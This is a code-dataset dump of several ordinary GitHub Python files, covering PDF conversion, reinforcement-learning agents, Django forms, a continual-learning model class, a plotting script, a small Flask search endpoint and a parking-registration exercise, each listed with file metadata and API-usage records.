seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22604148885 | import os
import pypdfium2 as pdfium
files = []
for file in os.listdir('.'):
#split the file name and get the extension
extension = os.path.splitext(file)[1]
if extension == '.pdf':
files.append(os.path.abspath(file))
# Load a pdf document
for filepath in files:
filename = os.path.basename(filepath)
filename = os.path.splitext(filename)[0]
pdf = pdfium.PdfDocument(filepath)
page_indices = [i for i in range(len(pdf))]
renderer = pdf.render_to(pdfium.BitmapConv.pil_image, page_indices = page_indices)
if not os.path.exists(filename):
#make a directory to store the images with the same name as the pdf file
os.mkdir(filename)
#check if the current directory is the temporary directory
if os.getcwd() != filename:
#change directory to the newly created directory
os.chdir(filename)
for image, index in zip(renderer, page_indices):
#save the image
image.save("output_%02d.jpg" % index)
#change directory to the parent directory
os.chdir('..') | Lethaldroid/Python_PDF_to_JPG | pdf_to_jpeg.py | pdf_to_jpeg.py | py | 1,122 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path.splitext",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
21009250510 | import math
import time
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils
from agent.sarsa import Sarsa
class GeneratorB(nn.Module):
def __init__(self, tau_dim, skill_dim, hidden_dim):
super().__init__()
self.skill_pred_net = nn.Sequential(nn.Linear(tau_dim, hidden_dim),
nn.ReLU(),
nn.Linear(hidden_dim, hidden_dim),
nn.ReLU(),
nn.Linear(hidden_dim, skill_dim))
self.apply(utils.weight_init)
def forward(self, tau):
skill_pred = self.skill_pred_net(tau)
return skill_pred
class Discriminator(nn.Module):
def __init__(self, tau_dim, feature_dim, hidden_dim):
super().__init__()
# def SimClR :
self.embed = nn.Sequential(nn.Linear(tau_dim, hidden_dim),
nn.ReLU(),
nn.Linear(hidden_dim, hidden_dim),
nn.ReLU(),
nn.Linear(hidden_dim, feature_dim))
self.project_head = nn.Sequential(nn.Linear(feature_dim, hidden_dim),
nn.ReLU(),
nn.Linear(hidden_dim, feature_dim))
self.apply(utils.weight_init)
def forward(self, tau):
features = self.embed(tau)
features = self.project_head(features)
return features
class OURCAgent(Sarsa):
def __init__(self, contrastive_scale,
update_encoder, contrastive_update_rate,skill_dim, temperature, update_skill_every_step,
**kwargs):
self.skill_dim = skill_dim
kwargs["meta_dim"] = self.skill_dim
super().__init__(**kwargs)
self.contrastive_scale = contrastive_scale
self.update_encoder = update_encoder
self.batch_size = kwargs['batch_size']
self.contrastive_update_rate = contrastive_update_rate
self.temperature = temperature
self.update_skill_every_step = update_skill_every_step
self.tau_len = update_skill_every_step
# create ourc
self.gb = GeneratorB(self.obs_dim - self.skill_dim, self.skill_dim,
kwargs['hidden_dim']).to(kwargs['device'])
self.discriminator = Discriminator(self.obs_dim - self.skill_dim,
self.skill_dim,
kwargs['hidden_dim']).to(kwargs['device'])
# loss criterion
self.gb_criterion = nn.CrossEntropyLoss()
self.discriminator_criterion = nn.CrossEntropyLoss()
# optimizers
self.gb_opt = torch.optim.Adam(self.gb.parameters(), lr=self.lr)
self.dis_opt = torch.optim.Adam(self.discriminator.parameters(), lr=self.lr)
self.gb.train()
self.discriminator.train()
self.skill_ptr = 0
def init_meta(self):
skill = np.zeros(self.skill_dim, dtype=np.float32)
skill[self.skill_ptr] = 1
meta = OrderedDict()
meta['skill'] = skill
return meta
def update_meta(self, meta, global_step, time_step, finetune=False):
if global_step % self.update_skill_every_step == 0:
self.skill_ptr = (self.skill_ptr + 1) % self.skill_dim
return self.init_meta()
return meta
def update_gb(self, skill, gb_batch, step):
metrics = dict()
labels = torch.argmax(skill, dim=1)
loss, df_accuracy = self.compute_gb_loss(gb_batch, labels)
self.gb_opt.zero_grad()
loss.backward()
self.gb_opt.step()
return metrics
def update_contrastive(self, taus, skills):
metrics = dict()
features = self.discriminator(taus)
loss = self.compute_info_nce_loss(features, skills)
loss = torch.mean(loss)
metrics['loss'] = loss.item()
self.dis_opt.zero_grad()
loss.backward()
self.dis_opt.step()
return metrics
def compute_intr_reward(self, skills, tau_batch, metrics):
# compute q(z | tau) reward
d_pred = self.gb(tau_batch)
d_pred_log_softmax = F.log_softmax(d_pred, dim=1)
_, pred_z = torch.max(d_pred_log_softmax, dim=1, keepdim=True)
gb_reward = d_pred_log_softmax[torch.arange(d_pred.shape[0]), torch.argmax(skills, dim=1)] - math.log(
1 / self.skill_dim)
gb_reward = gb_reward.reshape(-1, 1)
# compute contrastive reward
features = self.discriminator(tau_batch)
# maximize softmax item
contrastive_reward = torch.exp(-self.compute_info_nce_loss(features, skills))
intri_reward = gb_reward + contrastive_reward * self.contrastive_scale
return intri_reward
def compute_info_nce_loss(self, features, skills):
size = features.shape[0] // self.skill_dim
labels = torch.argmax(skills, dim=1)
labels = (labels.unsqueeze(0) == labels.unsqueeze(1)).long()
labels = labels.to(self.device)
features = F.normalize(features, dim=1)
similarity_matrix = torch.matmul(features, features.T)
# discard the main diagonal from both: labels and similarities matrix
mask = torch.eye(labels.shape[0], dtype=torch.bool).to(self.device)
labels = labels[~mask].view(labels.shape[0], -1)
similarity_matrix = similarity_matrix[~mask].view(similarity_matrix.shape[0], -1)
similarity_matrix = torch.exp(similarity_matrix / self.temperature)
# don't limit update for all negative
pick_one_positive_sample_idx = torch.argmax(labels, dim=-1, keepdim=True)
pick_one_positive_sample_idx = torch.zeros_like(labels).scatter_(-1, pick_one_positive_sample_idx, 1)
neg = (~labels.bool()).long()
# select one and combine multiple positives
positives = torch.sum(similarity_matrix * pick_one_positive_sample_idx, dim=-1, keepdim=True)
negatives = torch.sum(similarity_matrix * neg, dim=-1, keepdim=True)
loss = -torch.log(positives / negatives)
return loss
def compute_gb_loss(self, taus, skill):
"""
DF Loss
"""
d_pred = self.gb(taus)
d_pred_log_softmax = F.log_softmax(d_pred, dim=1)
_, pred_z = torch.max(d_pred_log_softmax, dim=1, keepdim=True)
d_loss = self.gb_criterion(d_pred, skill)
df_accuracy = torch.sum(
torch.eq(skill,
pred_z.reshape(1,
list(
pred_z.size())[0])[0])).float() / list(
pred_z.size())[0]
return d_loss, df_accuracy
def update(self, buffer, step):
metrics = dict()
start = time.time()
if step % self.update_every_steps != 0:
return metrics
batch = buffer.sample_batch(1024)
obs, next_obs, action, rew, done, skill, next_skill = utils.to_torch(batch.values(), self.device)
metrics.update(self.update_contrastive(next_obs, skill))
for i in range(self.contrastive_update_rate - 1):
batch = buffer.sample_batch(1024)
obs, next_obs, action, rew, done, skill, next_skill = utils.to_torch(batch.values(), self.device)
metrics.update(self.update_contrastive(next_obs, skill))
# update q(z | tau)
# bucket count for less time spending
metrics.update(self.update_gb(skill, next_obs, step))
# compute intrinsic reward
with torch.no_grad():
intr_reward = self.compute_intr_reward(skill, next_obs, metrics)
metrics["reward"] = intr_reward.mean().item()
if not self.update_encoder:
obs = obs.detach()
next_obs = next_obs.detach()
action = action.cpu().numpy().astype('int').flatten()
obs = obs.cpu().numpy().astype('int').flatten()
next_obs = next_obs.cpu().numpy().astype('int').flatten()
next_action = self.act(next_obs, skill).flatten()
skill = torch.argmax(skill, dim=1).cpu().numpy()
intr_reward = intr_reward.cpu().numpy().flatten()
td_error = intr_reward + self.gamma * self.Q_table[next_obs, skill, next_action] - \
self.Q_table[obs, skill, action]
self.Q_table[obs, skill, action] += self.alpha * td_error
end = time.time()
if step % 10000 == 0:
print("on step : ",step, metrics, "update_time:", end-start)
return metrics
| Rooshy-yang/Four_Room_For_Exploartion | agent/ourc.py | ourc.py | py | 8,693 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
8503125846 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Thread, Post
class MySignUpForm(UserCreationForm):
# imie_i_nazwisko = forms.CharField(max_length=100, required=False, help_text='Nie wymagane')
first_name = forms.CharField(label='Imię', max_length=100, required=False, help_text='Nie wymagane')
last_name = forms.CharField(label='Nazwisko', max_length=100, required=False, help_text='Nie wymagane')
email = forms.EmailField(max_length=150)
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )
def __init__(self, *args, **kwargs):
super(MySignUpForm, self).__init__(*args, **kwargs)
self.fields['username'].help_text = 'Maksymalnie 150 znaków. Jedynie litery, cyfry i @/./+/-/_.'
self.fields['password1'].help_text = 'Twoje hasło musi zawierać co najmniej 8 znaków. '
class ThreadForm(forms.ModelForm):
class Meta:
model = Thread
fields = {'category_name', 'title', 'description'}
def __init__(self, *args, **kwargs):
super(ThreadForm, self).__init__(*args, **kwargs)
self.fields['description'].widget.attrs['style'] = 'width:800px; height:150px'
self.fields['title'].widget.attrs['style'] = 'width:600px; height:25px'
self.fields['category_name'].widget.attrs['style'] = 'width:300px; height:25px'
self.fields.keyOrder = ['title', 'category_name', 'description']
self.fields['category_name'].label = 'Kategoria'
self.fields['title'].label = 'Tytuł'
self.fields['description'].label = 'Opis'
class PostForm(forms.ModelForm):
class Meta:
model = Post
fields = {'text'}
def __init__(self, *args, **kwargs):
super(PostForm, self).__init__(*args, **kwargs)
self.fields['text'].label = 'Komentarz'
self.fields['text'].widget.attrs['cols'] = 100
self.fields['text'].widget.attrs['rows'] = 15
class ProfileUpdateForm(forms.ModelForm):
email = forms.EmailField(required=False, max_length=150)
# imie_i_nazwisko = forms.CharField(required=False)
first_name = forms.CharField(label='Imię', max_length=100, required=False, help_text='Nie wymagane')
last_name = forms.CharField(label='Nazwisko', max_length=100, required=False, help_text='Nie wymagane')
class Meta:
model = User
fields = ('email', 'first_name', 'last_name')
| TZdybel/Django-forum | forum/forms.py | forms.py | py | 2,532 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.forms.UserCreationForm",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.forms",
"line_number": 9,
"usage_type": "name"
},
{
"api_n... |
32413588902 | import copy
from abc import ABC, abstractmethod
from typing import Any, Callable, List, Optional, Set
import torch
from renate.models.layers import ContinualNorm
from renate.types import NestedTensors
from renate.utils.deepspeed import convert_to_tensor, recover_object_from_tensor
class RenateModule(torch.nn.Module, ABC):
"""A class for torch models with some additional functionality for continual learning.
``RenateModule`` derives from ``torch.nn.Module`` and provides some additional functionality
relevant to continual learning. In particular, this concerns saving and reloading the model
when model hyperparameters (which might affect the architecture) change during hyperparameter
optimization. There is also functionality to retrieve internal-layer representations for use
in replay-based CL methods.
When implementing a subclass of ``RenateModule``, make sure to call the base class' constructor
and provide your model's constructor arguments. Besides that, you can define a
``RenateModule`` just like ``torch.nn.Module``.
Example::
class MyMNISTMLP(RenateModule):
def __init__(self, num_hidden: int):
super().__init__(
constructor_arguments={"num_hidden": num_hidden}
loss_fn=torch.nn.CrossEntropyLoss()
)
self._fc1 = torch.nn.Linear(28*28, num_hidden)
self._fc2 = torch.nn.Linear(num_hidden, 10)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self._fc1(x)
x = torch.nn.functional.relu(x)
return self._fc2(x)
The state of a ``RenateModule`` can be retrieved via the ``RenateModule.state_dict()`` method,
just as in ``torch.nn.Module``. When reloading a ``RenateModule`` from a stored state dict, use
``RenateModule.from_state_dict``. It wil automatically recover the hyperparameters and
reinstantiate your model accordingly.
Note: Some methods of ``RenateModule`` accept an optional ``task_id`` argument. This is in
anticipation of future methods for continual learning scenarios where task identifiers are
provided. It is currently not used.
Args:
constructor_arguments: Arguments needed to instantiate the model.
"""
def __init__(self, constructor_arguments: dict):
super(RenateModule, self).__init__()
self._constructor_arguments = copy.deepcopy(constructor_arguments)
self._tasks_params_ids: Set[str] = set()
self._intermediate_representation_cache: List[torch.Tensor] = []
self._hooks: List[Callable] = []
@classmethod
def from_state_dict(cls, state_dict):
"""Load the model from a state dict.
Args:
state_dict: The state dict of the model. This method works under the assumption that
this has been created by `RenateModule.state_dict()`.
"""
extra_state = recover_object_from_tensor(state_dict["_extra_state"])
constructor_arguments = extra_state["constructor_arguments"]
model = cls(**constructor_arguments)
for task in extra_state["tasks_params_ids"]:
model.add_task_params(task)
# TODO: See https://github.com/awslabs/Renate/issues/236.
# There are changes to the `class_means` or `componenets` of a model
# that are not loaded, and should probably not be stored.
model.load_state_dict(state_dict, strict=False)
return model
def get_extra_state(self, encode: bool = True) -> Any:
"""Get the constructor_arguments, and task ids necessary to reconstruct the model."""
extra_state = {
"constructor_arguments": self._constructor_arguments,
"tasks_params_ids": self._tasks_params_ids,
}
return convert_to_tensor(extra_state) if encode else extra_state
def set_extra_state(self, state: Any, decode: bool = True):
"""Extract the content of the ``_extra_state`` and set the related values in the module."""
extra_state = recover_object_from_tensor(state) if decode else state
self._constructor_arguments = extra_state["constructor_arguments"]
self._tasks_params_ids = extra_state["tasks_params_ids"]
@abstractmethod
def forward(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
"""Performs a forward pass on the inputs and returns the predictions.
This method accepts a task ID, which may be provided by some continual learning scenarios.
As an example, the task id may be used to switch between multiple output heads.
Args:
x: Input(s) to the model. Can be a single tensor, a tuple of tensor, or a dictionary
mapping strings to tensors.
task_id: The identifier of the task for which predictions are made.
Returns:
The model's predictions.
"""
pass
def get_params(self, task_id: Optional[str] = None) -> List[torch.nn.Parameter]:
"""User-facing function which returns the list of parameters.
If a ``task_id`` is given, this should return only parameters used for the specific task.
Args:
task_id: The task id for which we want to retrieve parameters.
"""
return list(self.parameters())
def _add_task_params(self, task_id: str) -> None:
"""Adds new parameters, associated to a specific task, to the model.
The method should not modify modules created in previous calls, beyond the ones defined
in ``self._add_task_params()``. The order of the calls is not guaranteed when the model
is loaded after being saved.
Args:
task_id: The task id for which the new parameters are added.
"""
pass
def add_task_params(self, task_id: Optional[str] = None) -> None:
"""Adds new parameters, associated to a specific task, to the model.
This function should not be overwritten; use ``_add_task_params`` instead.
Args:
task_id: The task id for which the new parameters are added.
"""
if task_id in self._tasks_params_ids:
return
self._add_task_params(task_id)
self._tasks_params_ids.add(task_id)
def get_logits(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
"""Returns the logits for a given pair of input and task id.
By default, this method returns the output of the forward pass. This may be overwritten
with custom behavior, if necessary.
Args:
x: Input(s) to the model. Can be a single tensor, a tuple of tensor, or a dictionary
mapping strings to tensors.
task_id: The task id.
"""
return self.forward(x, task_id)
def get_intermediate_representation(self) -> List[torch.Tensor]:
"""Returns the cached intermediate representation."""
return self._intermediate_representation_cache
def replace_batch_norm_with_continual_norm(self, num_groups: int = 32) -> None:
"""Replaces every occurence of batch normalization with continual normalization.
Pham, Q., Liu, C., & Hoi, S. (2022). Continual normalization: Rethinking batch
normalization for online continual learning. arXiv preprint arXiv:2203.16102.
Args:
num_groups: Number of groups when considering the group normalization in continual
normalization.
"""
def _replace(module):
for name, child in module.named_children():
if not list(module.children()):
_replace(child)
if isinstance(
child, (torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d)
):
setattr(
module,
name,
ContinualNorm(
num_features=child.num_features,
eps=child.eps,
momentum=child.momentum,
affine=child.affine,
track_running_stats=child.track_running_stats,
num_groups=num_groups,
),
)
_replace(self)
def _intermediate_representation_caching_hook(self) -> Callable:
"""Hook to cache intermediate representations during training."""
def hook(m: torch.nn.Module, _, output: torch.Tensor) -> None:
if m.training:
self._intermediate_representation_cache.append(output)
return hook
def register_intermediate_representation_caching_hook(self, module: torch.nn.Module) -> None:
"""Add a hook to cache intermediate representations during training.
Store the reference to the hook to enable its removal.
Args:
module: The module to be hooked.
"""
hook = module.register_forward_hook(self._intermediate_representation_caching_hook())
self._hooks.append(hook)
def deregister_hooks(self) -> None:
"""Remove all the hooks that were registered."""
for hook in self._hooks:
hook.remove()
self._hooks = []
self.reset_intermediate_representation_cache()
def reset_intermediate_representation_cache(self) -> None:
"""Resets the intermediate representation cache."""
self._intermediate_representation_cache = []
class RenateWrapper(RenateModule):
"""A simple wrapper around a torch model.
If you are using a torch model with fixed hyperparameters, you can use this wrapper to expose
it as a ``RenateModule``. In this case, do _not_ use the ``from_state_dict`` method but
reinstantiate the model, wrap it, and call ``load_state_dict``. If a tuple or a dictionary of
tensors is passed to the `RenateWrapper`'s forward function, it is unpacked before passing it
to the torch model's forward function.
Example::
my_torch_model = torch.nn.Linear(28*28, 10) # Instantiate your torch model.
model = RenateWrapper(my_torch_model)
state_dict = torch.load("my_state_dict.pt")
model.load_state_dict(state_dict)
Args:
model: The torch model to be wrapped.
"""
def __init__(self, model: torch.nn.Module) -> None:
super().__init__(constructor_arguments={})
self._model = model
def forward(self, x: NestedTensors, task_id: Optional[str] = None) -> torch.Tensor:
if isinstance(x, torch.Tensor):
outputs = self._model(x)
elif isinstance(x, tuple):
outputs = self._model(*x)
elif isinstance(x, dict):
outputs = self._model(**x)
else:
raise TypeError(f"Expected tensor or tuple/dict of tensors; found {type(x)}.")
if isinstance(outputs, tuple) and len(outputs) == 1:
return outputs[0]
else:
return outputs
@classmethod
def from_state_dict(cls, state_dict):
raise NotImplementedError(
"RenateWrapper does not support `from_state_dict`. Instantiate the object using the "
"standard constructor, then call `load_state_dict`."
)
| awslabs/Renate | src/renate/models/renate_module.py | renate_module.py | py | 11,332 | python | en | code | 251 | github-code | 36 | [
{
"api_name": "torch.nn",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "abc.ABC",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "copy.deepcopy",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "typing.Set",
"line_number": 5... |
5555921496 | """
Created on October 19, 2018
@author: mae-ma
@attention: evaluation of the architectures
@contact: albus.marcel@gmail.com (Marcel Albus)
@version: 1.3.1
#############################################################################################
History:
- v1.3.1: cleanup
- v1.3.0: plot for q-vals
- v1.2.1: change filenames
- v1.2.0: use smoothed score output for better visualization
- v1.1.1: use relative paths
- v1.1.0: add click commands
- v1.0.0: first init
"""
import numpy as np
from matplotlib import pyplot as plt
import pickle
import yaml
import shutil
import os
import click
import datetime
def smooth(x, window_len=11, window='hanning'):
"""smooth the data using a window with requested size.
This method is based on the convolution of a scaled window with the signal.
The signal is prepared by introducing reflected copies of the signal
(with the window size) in both ends so that transient parts are minimized
in the begining and end part of the output signal.
input:
x: the input signal
window_len: the dimension of the smoothing window; should be an odd integer
window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
flat window will produce a moving average smoothing.
output:
the smoothed signal
example:
t=linspace(-2,2,0.1)
x=sin(t)+randn(len(t))*0.1
y=smooth(x)
see also:
numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve
scipy.signal.lfilter
TODO: the window parameter could be the window itself if an array instead of a string
NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.
"""
if x.ndim != 1:
raise ValueError("smooth only accepts 1 dimension arrays.")
if x.size < window_len:
raise ValueError("Input vector needs to be bigger than window size.")
if window_len < 3:
return x
if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:
raise ValueError(
"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'")
s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]
# print(len(s))
if window == 'flat': # moving average
w = np.ones(window_len, 'd')
else:
w = eval('np.'+window+'(window_len)')
y = np.convolve(w/w.sum(), s, mode='valid')
return y
class Evaluation:
def __init__(self):
# src_filepath = home/mae-ma/git/safety
# self.src_filepath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
self.src_filepath = os.getcwd()
self.plot_filename = None
with open(os.path.join(self.src_filepath, 'reward.yml'), 'r') as file:
self.reward = yaml.load(file)
with open(os.path.join(os.path.join(self.src_filepath, 'architectures'), 'config_dqn.yml'), 'r') as file:
self.dqn_config = yaml.load(file)
with open(os.path.join(self.src_filepath, 'model.yml'), 'r') as file:
self.model = yaml.load(file)
self.tgt_filepath = os.path.join(os.path.dirname(
os.path.dirname(__file__)), 'results')
if not os.path.exists(self.tgt_filepath):
os.makedirs(self.tgt_filepath)
def plot(self):
print('–'*50)
print('Plot "reward.yml"')
csv_path = os.path.join(os.getcwd(), 'training_log_DQN.csv')
self.csv = np.genfromtxt(csv_path, delimiter=',')
smoothed = smooth(self.csv[:, 2], 31)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(12, 12))
ax1.plot([_ for _ in range(len(smoothed))],
smoothed, 'b', label='loss')
ax1.set_ylabel('Loss')
score_value = [x[0] for x in self.reward]
score_time = [x[1] for x in self.reward]
ax2.plot(score_time, smooth(np.array(score_value), 11)[:-10], 'r', label='scores')
ax2.set_xlabel('Steps')
ax2.set_ylabel('Scores')
ax1.set_xlim([- len(smoothed)*.05, len(smoothed)*1.05])
ax2.set_xlim([- len(smoothed)*.05, len(smoothed)*1.05])
ax2.legend()
ax1.legend()
ax2.grid()
ax1.grid()
fig.tight_layout()
if self.model['config'][0]['class_name'] == 'Conv2D':
model = 'Conv2D'
else:
model = '-u' + str(self.model['config'][0]['config']['units'])
filename = 'lr' + \
str(self.dqn_config['learning_rate']).replace('.', '_') + \
'-g' + str(self.dqn_config['gamma']).replace('.', '_') + \
model + '.pdf'
self.plot_filename = filename
plt.savefig(filename)
plt.show()
print('–'*50)
def plot_q_vals(self):
csv_path = os.path.join(os.getcwd(), 'q_val_DQN.csv')
self.csv = np.genfromtxt(csv_path, delimiter=',')
smoothed = smooth(self.csv[:], 51)
fig, ax1 = plt.subplots(1, 1, figsize=(12, 12))
ax1.plot([_ for _ in range(len(smoothed))],
smoothed, 'b', label='Q values')
ax1.set_ylabel('Q values')
ax1.set_xlabel('Steps')
plt.legend()
plt.grid()
# plt.show()
def save_all(self):
print('–'*50)
filelist = ['weights.h5', 'target_weights.h5',
'reward.yml', 'replay_buffer.pkl', 'training_log_DQN.csv',
self.plot_filename, 'architectures/config_dqn.yml', 'model.yml']
folder = datetime.datetime.today().strftime('%Y_%m_%d-%H_%M') + '___' + self.plot_filename
folderpath = os.path.join(self.tgt_filepath, folder)
print('Save all files to: ' + folderpath)
if not os.path.exists(folderpath):
os.makedirs(folderpath)
for file in filelist:
shutil.copy2(os.path.join(self.src_filepath, file), folderpath)
print('–'*50)
@click.command()
@click.option('--plot/-no-plot', '-p/-np', default=True, help='plot the results from the "results.yaml" file')
@click.option('--save/--no-save', '-s/-ns', default=False, help='backups the files')
def main(plot, save):
ev = Evaluation()
print('src: ', ev.src_filepath)
if plot:
ev.plot()
# ev.plot_q_vals()
if save:
ev.save_all()
if __name__ == '__main__':
main()
| maralbus/safety | architectures/evaluation.py | evaluation.py | py | 6,362 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.r_",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "numpy.ones",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "numpy.convolve",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "os.getcwd",
"line_number"... |
31186639545 | from flask import Flask, request, jsonify
from flask_cors import CORS
from pymongo import MongoClient
import subprocess
import json
import os
app = Flask(__name__)
CORS(app)
# Load the config from config.json
with open('config/config.json') as config_file:
config_data = json.load(config_file)
# Connect to the MongoDB database
client = MongoClient(config_data['database'])
db = client['spotify']
collection = db['search_input']
@app.route('/search-artist', methods=['POST'])
def search_artist():
artist_name = request.json['artistName']
print(artist_name)
# Update the search_input document with the artist name
collection.update_one({}, {"$set": {"searchInput": artist_name}}, upsert=True)
# Execute the data.js script
subprocess.run(['node', 'data.js'])
response = {
'artistName': artist_name
}
return jsonify(response)
if __name__ == '__main__':
# Use the PORT environment variable provided by Heroku
port = int(os.environ.get(5000))
app.run(host='0.0.0.0', port=port) | PetteriDev/spotify1 | search.py | search.py | py | 1,041 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pymongo.MongoClient",
"line_n... |
25169647710 | import numpy as np
import matplotlib.pyplot as plt
def main():
N_bandits = 10
bandits_probs = abs(np.random.normal(size=N_bandits))
N_experiments = 100
N_episodes = 100
class Bandit:
def __init__(self,bandits_probs):
self.N = len(bandits_probs)
self.probs = bandits_probs
def get_reward(self,action):
rand = abs(np.random.normal())
reward = 1 if (rand > self.probs[action]) else 0
return reward
class Agent:
def __init__(self,bandit):
self.k = np.zeros(bandit.N,dtype=np.int)
self.Q = np.zeros(bandit.N,dtype=np.float)
def update_Q(self,action,reward):
self.k[action] +=1
self.Q[action] += (reward - self.Q[action])/self.k[action]
def experiment(agent,bandit,N_episodes):
action_history = []
reward_history = np.zeros(bandit.N)
for i in range(N_episodes):
for j in range(N_bandits):
reward = bandit.get_reward(j)
agent.update_Q(j,reward)
#action_history.append(action)
reward_history[j] = reward
print(reward_history.shape)
return np.array(reward_history)
reward_history_avg = np.zeros(N_bandits)
for i in range(N_experiments):
bandit = Bandit(bandits_probs)
agent = Agent(bandit)
reward_history = experiment(agent,bandit,N_episodes)
reward_history_avg += reward_history
reward_history_avg /=np.float(N_experiments)
best_arm = np.argmax(reward_history_avg)
print("Reward history avg ={}".format(reward_history_avg))
print("The Best arm to choose after {} experiments is {} with a reward of {}".format(N_experiments,best_arm,reward_history_avg.max()))
plt.plot(reward_history_avg)
plt.show()
main() | rohilrg/Online-Learning-Bandits-Reinforcement-Learning | IU.py | IU.py | py | 1,870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.random.normal",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.normal",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
73952796902 | # PARKING MANAGEMENT #
#
import datetime
#
# For insurance purposes, the management of an office building is required to
# maintain, at all time, an accurate list of all the vehicles in the dedicated
# parking. In addition, for billing the different companies, the office
# building management wants to record occupation of the parking at different
# times and automatically emit bills to each specific companies.
#
# You are tasked with completing the series of functions below that fill the
# need of the office building parking management. You are allowed (and
# encouraged) to create additional, intermediate functions.
#
# The main data structure that your suite of function handles is a record of
# entrances and exits. A sample is given below. It consist of a pair of lists
# of tuples. The first list gives the timestamps and license plate number of
# vehicles entering the parking, the second exiting.
#
# DO NOT MODIFY CONSTANTS
PARKING_DATA_SAMPLE = ([
(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT'),
(datetime.datetime(2017, 12, 12, 7, 13, 48, 0), 'LC11FBF'),
(datetime.datetime(2017, 12, 12, 7, 13, 59, 0), 'LR10ZPP'),
(datetime.datetime(2017, 12, 12, 7, 15, 2, 0), 'LJ65OSN'),
(datetime.datetime(2017, 12, 12, 7, 15, 22, 0), 'LA63EWH'),
(datetime.datetime(2017, 12, 12, 13, 1, 42, 0), 'LC11FBF')
], [(datetime.datetime(2017, 12, 12, 12, 13, 1, 0), 'LC11FBF'),
(datetime.datetime(2017, 12, 12, 16, 42, 10, 0), 'LR10ZPP'),
(datetime.datetime(2017, 12, 12, 17, 2, 41, 0), 'LR10GHT'),
(datetime.datetime(2017, 12, 12, 17, 2, 58, 0), 'LA63EWH'),
(datetime.datetime(2017, 12, 12, 17, 4, 3, 0), 'LJ65OSN'),
(datetime.datetime(2017, 12, 12, 17, 10, 21, 0), 'LC11FBF')])
#
# A secondary data structure includes billing information. It is a dictionary
# that maps company names to a list of registered license plates.
#
# DO NOT MODIFY CONSTANTS
COMPANY_REGISTRATIONS_SAMPLE = {
'Shire Tobacco Inc.': ['LR10GHT', 'LA63EWH'],
'Rohan Equestrian Equipments': [],
'Moria Construction Hardware': ['LC11FBF', 'LS66XKE', 'LR10ZPP', 'LJ65OSN']
}
def register_car(registration, company, plate):
"""
Registers a new car.
NOTE: this function should not modify the registration dictionary that is
given, instead it should create a new dictionary.
NOTE: this function should not introduce duplicates in the registration
system. Specifically, if a car is already registered with the given
company it should return an identical registration information. If the car
is registered with a different company it should remove the first
registration.
NOTE: if the company is not listed in the dictionary, it should not
introduce it. Instead it should just return an identical registration.
E.g., register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries',
'JARVIS')
is {'Stark Industries': ['IRNMN', 'JARVIS']}
E.g., register_car({'Stark Industries': ['IRNMN']}, 'Wayne Enterprises',
'IMBTMN')
is {'Stark Industries': ['IRNMN']}
:param registration: preexisting registration information
:param company: company to register the car for
:param plate: license plate of the car to register
:return: new registration information dictionary with added registration
:rtype: dict
"""
l_registration = registration
for key, value in l_registration.items():
if company != key:
if plate in [x for v in l_registration.values() for x in v]:
try:
l_registration[key].remove(plate)
except ValueError:
a = 0
for key, value in l_registration.items():
if company == key:
if plate not in [x for v in l_registration.values() for x in v]:
l_registration[key].append(plate)
return l_registration
register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries', 'JARVIS')
register_car({'Stark Industries': ['IRNMN']}, 'Wayne Enterprises', 'IMBTMN')
register_car({'X': []}, 'X', 'A')
register_car({'X': [], 'Y': ['A']}, 'X', 'A')
register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries', 'JARVIS')
